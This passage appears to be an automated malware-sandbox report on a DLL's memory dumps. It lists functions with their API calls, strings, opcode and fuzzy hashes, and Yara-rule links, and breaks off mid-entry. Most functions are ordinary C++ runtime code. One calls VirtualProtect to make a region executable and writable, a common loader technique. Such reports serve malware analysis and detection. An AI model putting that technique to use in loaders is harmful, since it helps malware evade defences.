Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: a5972166cd7c7c23ca78a2a5869c1563ae1ffbc0aba8bba3e0fef1dcdf37081d
Instruction ID: 91a8c59dda25ff67eac54beaac10ca2b47c04f0bfd38dfe71d108b06d9820a6b
Opcode Fuzzy Hash: a5972166cd7c7c23ca78a2a5869c1563ae1ffbc0aba8bba3e0fef1dcdf37081d
Instruction Fuzzy Hash: 3EF0A93D6C851166C70267745C49F6A25769FD2775F374119F62CD2285EF24CC0281E7

Uniqueness

Uniqueness Score: -1.00%

Function 6D4875E8, Relevance: 9.0, APIs: 6, Instructions: 33COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D4875F4

Part of subcall function 6D4873A9: std::exception::exception.LIBCONCRT ref: 6D4873B6

__CxxThrowException@8.LIBVCRUNTIME ref: 6D487602

Part of subcall function 6D4A3D74: RaiseException.KERNEL32(00000000,?,uHm,00000000,?,?,?,?,?,?,?,6D4875E7,00000000,6D5414C0,?), ref: 6D4A3DD4

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D487614

Part of subcall function 6D4873E3: std::exception::exception.LIBCONCRT ref: 6D4873F0

__CxxThrowException@8.LIBVCRUNTIME ref: 6D487622
std::regex_error::regex_error.LIBCPMT ref: 6D487634

Part of subcall function 6D487426: std::exception::exception.LIBCONCRT ref: 6D48743E

__CxxThrowException@8.LIBVCRUNTIME ref: 6D487642

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$std::invalid_argument::invalid_argument$ExceptionRaisestd::regex_error::regex_error
String ID:
API String ID: 2570946744-0
Opcode ID: aff9cf780a6fa4cfb1527df65c0bc9b44b08aede3800d48b98edd108c2e1c919
Instruction ID: 01140425eafde6d342faf02eebf472e4aab41b4a677c0082fbf49875db3084ba
Opcode Fuzzy Hash: aff9cf780a6fa4cfb1527df65c0bc9b44b08aede3800d48b98edd108c2e1c919
Instruction Fuzzy Hash: 59F08275C0810CB7CB04FAE4EC49DEDBB7CAA14240F408528AB14A2446EB71AB19CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 6D47F218, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 215memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(6D5486A0,0000305A,00000040,6D54869C,?,00000000,92216ED4,008B70A2,?), ref: 6D47F2D5

Strings

DZTm, xrefs: 6D47F27D
DZTm, xrefs: 6D47F498
YTm, xrefs: 6D47F239
YTm, xrefs: 6D47F385

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ProtectVirtual
String ID: DZTm$DZTm$YTm$YTm
API String ID: 544645111-3529307735
Opcode ID: e9d55c8151c40fcc33d7f87b8ff0d37e22b6c67b4a2a3c1b604067c7c1c9f913
Instruction ID: 73c71d60fa18f8736f22f6c2c61d0d33c9e0daf5e5b3b3ea1fa0142bcea8d3bc
Opcode Fuzzy Hash: e9d55c8151c40fcc33d7f87b8ff0d37e22b6c67b4a2a3c1b604067c7c1c9f913
Instruction Fuzzy Hash: 1B81E371A021519FCF04EF69C881BBD7BF4BB56325B26812BE441DBBC1E3349984CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6D4853EB, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 6D4853F5
__Getcvt.LIBCPMT ref: 6D48540B
__Getcvt.LIBCPMT ref: 6D485445

Strings

true, xrefs: 6D48547B
false, xrefs: 6D485466

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Getcvt$H_prolog3_catch_
String ID: false$true
API String ID: 1810345438-2658103896
Opcode ID: c123c79331af504d8fa3ff32f3f0db8de236acc716cf7689f23ff015745e0d24
Instruction ID: 5fd1055840b6146768ea62716889889f2e9c0d23049aec95d9badd19c966c162
Opcode Fuzzy Hash: c123c79331af504d8fa3ff32f3f0db8de236acc716cf7689f23ff015745e0d24
Instruction Fuzzy Hash: 81217EB5D05218ABDB01CFA0C880EEE7BB8BF15750F09406AE905AB201E731DD05CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C970F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6D4C96A5,?,?,6D4C9645,?,6D542D28,0000000C,6D4C978A), ref: 6D4C972F
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6D4C9742
FreeLibrary.KERNEL32(00000000,?,?,?,6D4C96A5,?,?,6D4C9645,?,6D542D28,0000000C,6D4C978A), ref: 6D4C9765

Strings

mscoree.dll, xrefs: 6D4C9728
CorExitProcess, xrefs: 6D4C973A

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: bebf8353442babb216cbf69769ea4fd96640f8b52c1aa9b2f157f20ff1feb5c1
Instruction ID: 2b857e0b770488a5c32586f3704ae1972540cae78ca4b647c3661cfd5c28b010
Opcode Fuzzy Hash: bebf8353442babb216cbf69769ea4fd96640f8b52c1aa9b2f157f20ff1feb5c1
Instruction Fuzzy Hash: 82F06D34A02109FBDF01AF91C849FBEBFB9EF85316F114069F905A6251CB318E45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D4D4E2A, Relevance: 7.7, APIs: 5, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54d774c7bdf487188b6d7ae0938af91626fc4fd70efa032fcef302cdc068989e
Instruction ID: 7ed434a9337e0542b087085c0ba57c337520ed1add91e1c0926d2ac55d8672c1
Opcode Fuzzy Hash: 54d774c7bdf487188b6d7ae0938af91626fc4fd70efa032fcef302cdc068989e
Instruction Fuzzy Hash: 0771AD319042179BDB52DF98C8A4EBFBB75EF47350F244229E924A7284CB718D46CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CA737, Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6D4CA7A9
_free.LIBCMT ref: 6D4CA7C9

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 980be91b5521d63f7622da9dd32fb0b3ec8bab83566713bf4c411f1a318c42ba
Instruction ID: 92e4df630345e63b1691b6499e202068a405d19f958651a0f2a8a9c7750779bd
Opcode Fuzzy Hash: 980be91b5521d63f7622da9dd32fb0b3ec8bab83566713bf4c411f1a318c42ba
Instruction Fuzzy Hash: C841C13AB412049FCB10CF78C881E69B7B5FF85714B268169E555EB341D731ED02CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CD683, Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(6D4875D9,6D4875D9,00000002,6D4C2286,6D4CF2B0,00000000,?,6D4A0F8B,00000002,00000000,?,?,?,6D461298,6D4875D9,00000004), ref: 6D4CD688
_free.LIBCMT ref: 6D4CD6BD
_free.LIBCMT ref: 6D4CD6E4
SetLastError.KERNEL32(00000000,?,6D4875D9), ref: 6D4CD6F1
SetLastError.KERNEL32(00000000,?,6D4875D9), ref: 6D4CD6FA

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 7d943080dfe84c9fad7f088962f8b9f73b5256eed1440d9cb83e6391da07ac24
Instruction ID: 94681b435a52e262c44d0d30fc86789efb4e5cfecb520baf8f87450fb6a76608
Opcode Fuzzy Hash: 7d943080dfe84c9fad7f088962f8b9f73b5256eed1440d9cb83e6391da07ac24
Instruction Fuzzy Hash: 9901A93E3C950277C602A7655C89F6B667A9FD33757264129F51DD2242EF70CC0281A7

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DCCC3, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6D4DCCDB

Part of subcall function 6D4CCBD3: HeapFree.KERNEL32(00000000,00000000,?,6D4DCFAF,00000000,00000000,00000000,00000000,?,6D4DD2B4,00000000,00000007,00000000,?,6D4DC0FC,00000000), ref: 6D4CCBE9
Part of subcall function 6D4CCBD3: GetLastError.KERNEL32(00000000,?,6D4DCFAF,00000000,00000000,00000000,00000000,?,6D4DD2B4,00000000,00000007,00000000,?,6D4DC0FC,00000000,00000000), ref: 6D4CCBFB

_free.LIBCMT ref: 6D4DCCED
_free.LIBCMT ref: 6D4DCCFF
_free.LIBCMT ref: 6D4DCD11
_free.LIBCMT ref: 6D4DCD23

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 925f8a090491a61dd12502a7d0d53b0bec77ac97227391e03917ada3cfecffcb
Instruction ID: dbea0220b2fb5b7166f342ea7973593ef5a2c13fb16ba282f2e4b9bbba46459e
Opcode Fuzzy Hash: 925f8a090491a61dd12502a7d0d53b0bec77ac97227391e03917ada3cfecffcb
Instruction Fuzzy Hash: 28F049395082059BCA50EB99F8C4D2B77FBAE097117724C09E129D7A09DB30FC808AE2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C7D8A, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMON

Download Yara Rule

APIs

__freea.LIBCMT ref: 6D4C7F3C
__freea.LIBCMT ref: 6D4C7F5A

Strings

am/pm, xrefs: 6D4C7FBD
a/p, xrefs: 6D4C8021

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __freea
String ID: a/p$am/pm
API String ID: 240046367-3206640213
Opcode ID: bf299a632701c95deb640216f8b869094ee1c025a32a9878b5df17d032a2e47d
Instruction ID: e50e0fbe26b4272616e04648563d4ceec8ecd4bf1967399f6ea10f3f33151f45
Opcode Fuzzy Hash: bf299a632701c95deb640216f8b869094ee1c025a32a9878b5df17d032a2e47d
Instruction Fuzzy Hash: 4BD1F1399582079BDB068F68C891FBAB7B0FF46300F25815AE914AB344DB359D81CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6D484267, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6D48426E
_wcslen.LIBCMT ref: 6D484281

Strings

For, xrefs: 6D484273, 6D484349
`kTm, xrefs: 6D4842C8

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog3_catch_wcslen
String ID: For$`kTm
API String ID: 1260878687-401955702
Opcode ID: f754481efac48e79561b579855f92cd0e623dd6ba06c492f3ea5485258eecb51
Instruction ID: ef542f1e23634fc6566887ff0bda92040e26853422f7795ea999a288b8ddeb0a
Opcode Fuzzy Hash: f754481efac48e79561b579855f92cd0e623dd6ba06c492f3ea5485258eecb51
Instruction Fuzzy Hash: D541E13960470DCBCB11DB98C590EACB7B6BB5E7E4B258149E5589B792CB30DC42CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4D8AAC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6D4D8B1F
_free.LIBCMT ref: 6D4D8B75

Part of subcall function 6D4D8951: _free.LIBCMT ref: 6D4D89A9
Part of subcall function 6D4D8951: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6D4F2130), ref: 6D4D89BB
Part of subcall function 6D4D8951: WideCharToMultiByte.KERNEL32(00000000,00000000,6D547A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6D4D8A33
Part of subcall function 6D4D8951: WideCharToMultiByte.KERNEL32(00000000,00000000,6D547A70,000000FF,?,0000003F,00000000,?), ref: 6D4D8A60

Strings

0!Om, xrefs: 6D4D8AD8

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID: 0!Om
API String ID: 314583886-2885829957
Opcode ID: a6dda6af15dc91449fc7dd5b0f06990f3ebd4a217f54162024da5da8c118ef49
Instruction ID: 35ef13777fcbb48592c08ac7717ce40a482faead7afb13ca20ccd993df11ec08
Opcode Fuzzy Hash: a6dda6af15dc91449fc7dd5b0f06990f3ebd4a217f54162024da5da8c118ef49
Instruction Fuzzy Hash: 95212EB2C08219A7DB61D6688C51EFBB778DF82724F120299F694A6240EF704DC1C6F1

Uniqueness

Uniqueness Score: -1.00%

Function 6D461EEA, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 6D461F4E

Strings

ios_base::eofbit set, xrefs: 6D461F1B
ios_base::failbit set, xrefs: 6D461F16
ios_base::badbit set, xrefs: 6D461F0C, 6D461F31

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: e834367e8567e4e2444066b32b6eb4d8ba3e486f69a4a25bee49e583b73a50ab
Instruction ID: 8f5cd1dbfea4aec791d0285c22fe1fec9352b09c8922660a99fd357d9f078f89
Opcode Fuzzy Hash: e834367e8567e4e2444066b32b6eb4d8ba3e486f69a4a25bee49e583b73a50ab
Instruction Fuzzy Hash: 4AF02DB3D042457ADB08D978C802FED33985B44314F148459EA539B182F765EC02CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 6D48407D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D484084
_strlen.LIBCMT ref: 6D4840AF
_strlen.LIBCMT ref: 6D4840C6

Strings

[json.exception., xrefs: 6D48409F, 6D4840A7, 6D4840C5, 6D4840CD

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _strlen$H_prolog3
String ID: [json.exception.
API String ID: 2883720156-791563284
Opcode ID: 4e5294a9d03aaee277b972c11aa41121be4c354e52aa03692be3c77340fdc4ba
Instruction ID: 6649a8bc66c9d2049c3faa84d305a33c60b057c34159dcdde10f2931f45a702d
Opcode Fuzzy Hash: 4e5294a9d03aaee277b972c11aa41121be4c354e52aa03692be3c77340fdc4ba
Instruction Fuzzy Hash: 49F090B0A08205AFCB04DF38D840EBEB6E9BF84248F46051EE109D7246DBB49D0087E2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CF345, Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 6D4CF3D0
__alldvrm.LIBCMT ref: 6D4CF5D1
__alldvrm.LIBCMT ref: 6D4CF5F3

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 6deae34975e8103ed65886de447e5f7072f6a5271229e2bb310e9ca1a4878613
Instruction ID: e84c5f9495c90dacea5f072cab6b042dba9c3e0a2602624e26f1d6188bea8fbe
Opcode Fuzzy Hash: 6deae34975e8103ed65886de447e5f7072f6a5271229e2bb310e9ca1a4878613
Instruction Fuzzy Hash: E9A1587AA0B2469FE701CE58C890FBABBE4EF55354F2841ADD6849B381C33C8D42C752

Uniqueness

Uniqueness Score: -1.00%

Function 6D4D6102, Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,6D4F0EA8,00000000,00000000,008B018B,6D4CDA1E,?,00000004,00000001,6D4F0EA8,0000007F,?,008B018B,00000001), ref: 6D4D614F
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6D4D61D8
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6D4D61EA
__freea.LIBCMT ref: 6D4D61F3

Part of subcall function 6D4CF26D: RtlAllocateHeap.NTDLL(00000000,6D4875D9,00000000,?,6D4A0F8B,00000002,00000000,?,?,?,6D461298,6D4875D9,00000004,00000000,00000000,00000000), ref: 6D4CF29F

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: bb493e68417a2ad0b84534192dafb2cfbd07512ff017814fba3a1c1b55001d69
Instruction ID: 760bad91731f46043f85261fbed3293d554a65bb21d8f4e7c5aa90fbb51927c4
Opcode Fuzzy Hash: bb493e68417a2ad0b84534192dafb2cfbd07512ff017814fba3a1c1b55001d69
Instruction Fuzzy Hash: D131BA72A0021AABDF15CFA8CC95EAE7BA5EF41714F15412DE814DA241EB35CC55CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4D3E7F, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,6D4D3E26,?,00000000,00000000,00000000,?,6D4D41BD,00000006,FlsSetValue), ref: 6D4D3EB1
GetLastError.KERNEL32(?,6D4D3E26,?,00000000,00000000,00000000,?,6D4D41BD,00000006,FlsSetValue,6D4F1C58,FlsSetValue,00000000,00000364,?,6D4CD6D1), ref: 6D4D3EBD
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,6D4D3E26,?,00000000,00000000,00000000,?,6D4D41BD,00000006,FlsSetValue,6D4F1C58,FlsSetValue,00000000), ref: 6D4D3ECB

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: d2f14acbd8f8f69f2a35fa444f64068a14ae5e8811faf2524539db17c00bb9db
Instruction ID: f4ba6cba7c2a47aa563db4f848440b999e66e29c8bbdbb2bce5cb9491b7e5270
Opcode Fuzzy Hash: d2f14acbd8f8f69f2a35fa444f64068a14ae5e8811faf2524539db17c00bb9db
Instruction Fuzzy Hash: 8E01F732755233AFCB529A699C5DF57B7B8AF067A17200220F909D32C1DB21DC01C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 6D491558, Relevance: 6.0, APIs: 4, Instructions: 40COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D49155F
std::_Locinfo::_Locinfo.LIBCPMT ref: 6D491594

Part of subcall function 6D461450: __EH_prolog3.LIBCMT ref: 6D461457
Part of subcall function 6D461450: std::_Lockit::_Lockit.LIBCPMT ref: 6D461464
Part of subcall function 6D461450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6D4614A1

numpunct.LIBCPMT ref: 6D4915A5

Part of subcall function 6D490143: __EH_prolog3.LIBCMT ref: 6D49014A

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6D4915B6

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
String ID:
API String ID: 495030518-0
Opcode ID: ef582b22d29c1a7836e7745599b112703657f6caa16865cdf3dded9e61d6c2f3
Instruction ID: 6ecec4f7b5bb96e8e0e965ae0d991fa729d6195df90b5ac8e4ba5522e89d6ea9
Opcode Fuzzy Hash: ef582b22d29c1a7836e7745599b112703657f6caa16865cdf3dded9e61d6c2f3
Instruction Fuzzy Hash: 06016271945216DEDB00CB95C850EAD7B74AF54765F620119E65AAB284CBB04E01C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4914EC, Relevance: 6.0, APIs: 4, Instructions: 40COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6D4914F3
std::_Locinfo::_Locinfo.LIBCPMT ref: 6D491528

Part of subcall function 6D461450: __EH_prolog3.LIBCMT ref: 6D461457
Part of subcall function 6D461450: std::_Lockit::_Lockit.LIBCPMT ref: 6D461464
Part of subcall function 6D461450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6D4614A1

numpunct.LIBCPMT ref: 6D491539

Part of subcall function 6D490110: __EH_prolog3.LIBCMT ref: 6D490117

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6D49154A

Memory Dump Source

Source File: 00000000.00000002.917299629.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000000.00000002.917294141.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917348475.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.925206892.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.927426246.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.928422377.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$H_prolog3$LocinfoLocinfo::_$Locinfo::~_Locinfo_ctorLockitLockit::_numpunct
String ID:
API String ID: 495030518-0
Opcode ID: bace20ca603ba7d7d34818d865acf45928c7b2182a547dc031d87b540739d7f8
Instruction ID: 53f70a4b2cabe05823c58032475964ea69ad78a82bf228fc5605f89aaf93a7fb
